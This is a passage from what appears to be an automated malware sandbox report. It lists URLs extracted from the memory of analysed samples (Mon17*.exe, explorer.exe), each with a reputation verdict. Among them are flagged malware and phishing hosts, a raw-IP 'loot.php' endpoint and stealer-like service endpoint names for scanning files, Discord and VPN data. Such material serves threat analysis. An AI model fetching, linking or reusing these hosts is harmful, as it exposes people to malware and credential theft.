                  http://tempuri.org/IContract/ExtensionScannedFilesMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://staticimg.youtuuee.com/bzMon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://niemannbest.me/?username=p11_4Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://niemannbest.me/?username=p11_3Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://niemannbest.me/?username=p11_6Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/SetEnvironmentResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://niemannbest.me/?username=p11_5Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://tempuri.org/IContract/ExtensionInstalledBrowsersResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.ver)svchost.exe, 0000002B.00000002.3465357200.000002804D88C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionScannedFilesResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://hsiens.xyz/setup_installer.exe, 00000001.00000003.1691383572.000000000352D000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1969066359.0000000000880000.00000004.00000020.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp, setup_install.exe.1.drfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionOpenVPNMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ip-api.com:80/json/Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF55F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://45.9.20.13/partner/loot.php?pub=mixoneG:Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressingMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionDefendersLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://t.gogamec.com:443/2302/sqlite.dats://t.gogamec.com/2302/sqlite.datMon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://tempuri.org/IContract/ExtensionProcessesMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionInstalledBrowsersLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.discorPjYMon178817e243.exe, 00000016.00000002.4158008324.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://topniemannpickshop.cc/Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000245C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://45.133.1.107/server.txtiMon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000320B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionDiscordResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://outlook.com_explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/EnvironmentSettingsMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, 